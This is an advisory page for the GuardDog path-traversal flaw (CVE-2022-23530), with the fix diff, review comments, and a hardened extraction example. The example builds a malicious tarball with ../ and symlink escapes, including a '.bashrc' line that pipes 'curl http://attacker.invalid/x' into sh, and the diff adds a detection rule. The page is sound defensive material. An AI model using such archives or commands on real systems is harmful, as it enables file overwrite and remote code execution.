GuardDog vulnerable to arbitrary file write when scanning a specially-crafted remote PyPI package
Description
GuardDog is a CLI tool to identify malicious PyPI packages. Versions prior to 0.1.8 are vulnerable to arbitrary file write when scanning a specially crafted remote PyPI package: the scanner extracts the downloaded archive with shutil.unpack_archive(), which hands a tarball's member names to TarFile.extractall() without validating that each resulting path stays inside the intended destination directory, so a member whose name contains ../ components or is an absolute path is written outside that directory and can overwrite existing files. The issue is patched in version 0.1.8; the fix (commit 37c7d07, below) replaces shutil.unpack_archive() with tarsafe for .tar.gz archives. Potential workarounds include extracting with a module that sanitizes member paths (the advisory suggests zipfile) and validating the location of every extracted file, discarding those whose paths fall outside the destination.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
| guarddog (PyPI) | < 0.1.8 | 0.1.8 |
Affected products
Patches
37c7d0767ba2 Securely extract PyPI .tar.gz archives (#102)
3 files changed · +36 −5
.github/semgrep-rules/insecure-unpack-archive.yml+21 −0 added@@ -0,0 +1,21 @@ +rules: + - id: insecure-shutil-unpack-archive-use + message: The Python 'shutil' shutil.extract_archive is vulnerable to + arbitrary file overwrites + languages: + - python + severity: ERROR + metadata: + category: security + technology: + - python + owasp: + - A06:2017 - Security Misconfiguration + - A05:2021 - Security Misconfiguration + cwe: + - "CWE-22: Improper Limitation of a Pathname to a Restricted Directory + ('Path Traversal')" + license: Commons Clause License Condition v1.0[LGPL-2.1-only] + pattern-either: + - pattern: | + shutil.unpack_archive(...) \ No newline at end of file
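Review bot: The rule message names the wrong API: it reads "shutil.extract_archive is vulnerable to arbitrary file overwrites" while the pattern, and the call this commit removes, is shutil.unpack_archive, so a developer acting on the finding will search for a function that does not exist. Suggest a message such as "shutil.unpack_archive() extracts tar members without checking that they stay inside the destination directory (CWE-22)". The new file also lacks a trailing newline.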
.github/workflows/semgrep.yml+9 −1 modified@@ -26,9 +26,17 @@ jobs: - uses: actions/checkout@v3 - run: semgrep --config auto --sarif --output semgrep.sarif ./guarddog + - run: semgrep --config .github/semgrep-rules --sarif --output semgrep-custom.sarif ./guarddog - name: Upload SARIF file for GitHub Advanced Security Dashboard uses: github/codeql-action/upload-sarif@v2 with: + category: semgrep-builtin sarif_file: semgrep.sarif - if: always() + + - name: Upload SARIF file for custom Semgrep rules for GitHub Advanced Security Dashboard + uses: github/codeql-action/upload-sarif@v2 + with: + category: semgrep-custom + sarif_file: semgrep-custom.sarif +
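Review bot: `if: always()` is removed from the first upload-sarif step and not added to the new one, so if either `semgrep` run exits non-zero, both upload steps are skipped and neither SARIF file reaches the dashboard, which is exactly when the results are wanted. Suggest restoring `if: always()` on the first upload step and adding it to the second.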
guarddog/scanners/package_scanner.py+6 −4 modified@@ -1,7 +1,6 @@ import json import os -import shutil -import tarsafe # type: ignore +import tarsafe # type:ignore import tempfile import requests @@ -160,5 +159,8 @@ def download_compressed(self, url, zippath, unzippedpath): with open(zippath, "wb") as f: f.write(response.raw.read()) - shutil.unpack_archive(zippath, unzippedpath) - os.remove(zippath) + if zippath.endswith('.tar.gz'): + tarsafe.open(zippath).extractall(unzippedpath) + os.remove(zippath) + else: + raise ValueError("unsupported archive extension: " + zippath)
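Review bot: In the download_compressed hunk the new tar branch leaks the archive handle and the else branch narrows what the scanner accepts. `tarsafe.open(zippath).extractall(unzippedpath)` never closes the TarFile; use `with tarsafe.open(zippath) as tar: tar.extractall(unzippedpath)`. The else branch raises ValueError for every extension other than `.tar.gz` (so `.zip` downloads that shutil.unpack_archive used to handle, and `.tgz`, now fail), and because `os.remove(zippath)` moved inside the if branch, a rejected download is left on disk. If only sdists are meant to be scanned, say so in the error message or a docstring; otherwise route `.zip` through zipfile with the same containment check and remove the file on both paths.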
Vulnerability mechanics
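As an added illustration for this section (example code written for this page, not GuardDog's code or its fix), the block below constructs a .tar.gz in memory whose member names use the escapes the Description refers to (a ../ name, an absolute name, and a symlink pointing out of the tree followed by a write through it), then extracts it with a check that each resolved path, and each link target, stays under the destination directory. That containment check is what the pre-0.1.8 path shutil.unpack_archive() -> TarFile.extractall() did not perform; GuardDog 0.1.8 delegates it to the tarsafe library instead, and it is written out here so the rejected cases are visible. The archive contents, the helper names (build_malicious_sdist, check_member, safe_extract, demo) and the attacker.invalid host are all constructed for the example.

```python
from __future__ import annotations

import io
import os
import tarfile
import tempfile
from typing import Optional


def build_malicious_sdist() -> bytes:
    """Constructed sample input: an in-memory .tar.gz shaped like a PyPI sdist
    whose member names try to leave the extraction directory. Not a real package."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        def add(name: str, data: bytes = b"", **attrs) -> None:
            info = tarfile.TarInfo(name)          # TarInfo does not normalise names
            for key, value in attrs.items():
                setattr(info, key, value)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data) if data else None)

        add("evil-1.0/setup.py", b"from setuptools import setup; setup(name='evil')\n")
        add("../../.bashrc", b"curl http://attacker.invalid/x | sh\n")       # relative traversal
        add("/etc/cron.d/evil", b"* * * * * root id\n")                       # absolute member name
        add("evil-1.0/link", type=tarfile.SYMTYPE, linkname="../../../../etc")  # symlink out of tree
        add("evil-1.0/link/passwd", b"root::0:0::/:/bin/sh\n")               # write through the symlink
    return buf.getvalue()


def check_member(member: tarfile.TarInfo, dest: str) -> Optional[str]:
    """Return why `member` must not be extracted into `dest`, or None if it is safe.

    Every path is resolved with realpath and required to stay under the
    destination; link targets get the same test so that a symlink accepted now
    cannot redirect a later member outside the tree.
    """
    dest_real = os.path.realpath(dest)
    target = os.path.realpath(os.path.join(dest_real, member.name))
    if os.path.commonpath([dest_real, target]) != dest_real:
        return f"path escapes destination: {member.name!r}"
    if member.issym():
        # Symlink targets are relative to the link's own directory.
        link_target = os.path.realpath(os.path.join(os.path.dirname(target), member.linkname))
        if os.path.commonpath([dest_real, link_target]) != dest_real:
            return f"symlink points outside destination: {member.name!r} -> {member.linkname!r}"
    elif member.islnk():
        # Hard-link targets are relative to the archive root.
        link_target = os.path.realpath(os.path.join(dest_real, member.linkname))
        if os.path.commonpath([dest_real, link_target]) != dest_real:
            return f"hardlink points outside destination: {member.name!r} -> {member.linkname!r}"
    elif not (member.isfile() or member.isdir()):
        return f"unsupported member type: {member.name!r}"   # devices, FIFOs, etc.
    return None


def safe_extract(tar_bytes: bytes, dest: str) -> tuple[list[str], list[str]]:
    """Extract only members that pass check_member.

    Returns (extracted member names, rejection reasons). Members are visited in
    archive order, which is the order the attacker controls.
    """
    extracted, rejected = [], []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r:gz") as tar:
        for member in tar:
            reason = check_member(member, dest)
            if reason is not None:
                rejected.append(reason)
                continue
            tar.extract(member, dest)
            extracted.append(member.name)
    return extracted, rejected


def demo() -> dict:
    """Run the hardened extractor on the constructed archive in a scratch directory."""
    tar_bytes = build_malicious_sdist()
    with tempfile.TemporaryDirectory() as dest:
        extracted, rejected = safe_extract(tar_bytes, dest)
        on_disk = sorted(
            os.path.relpath(os.path.join(root, name), dest)
            for root, _dirs, files in os.walk(dest)
            for name in files
        )
    return {"extracted": extracted, "rejected": rejected, "on_disk": on_disk}


if __name__ == "__main__":
    result = demo()
    print("extracted:", result["extracted"])
    for reason in result["rejected"]:
        print("rejected:", reason)
```

Two members survive (setup.py and the passwd file) and three are rejected. The order matters: because the symlink is refused before evil-1.0/link/passwd is seen, that later member is created as an ordinary file under a real evil-1.0/link/ directory inside the destination instead of landing in /etc, which is the outcome an unchecked extractall() would have produced.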
References
- github.com/advisories/GHSA-78m5-jpmf-ch7v (GitHub Security Advisory)
- nvd.nist.gov/vuln/detail/CVE-2022-23530 (NVD entry)
- github.com/DataDog/guarddog/blob/a1d064ceb09d39bb28deb6972bc0a278756ea91f/guarddog/scanners/package_scanner.py (package_scanner.py at the referenced revision)
- github.com/DataDog/guarddog/commit/37c7d0767ba28f4df46117d478f97652594c491c (fix commit)
- github.com/DataDog/guarddog/security/advisories/GHSA-78m5-jpmf-ch7v (repository security advisory)
- github.com/pypa/advisory-database/tree/main/vulns/guarddog/PYSEC-2022-42993.yaml (PyPA advisory PYSEC-2022-42993)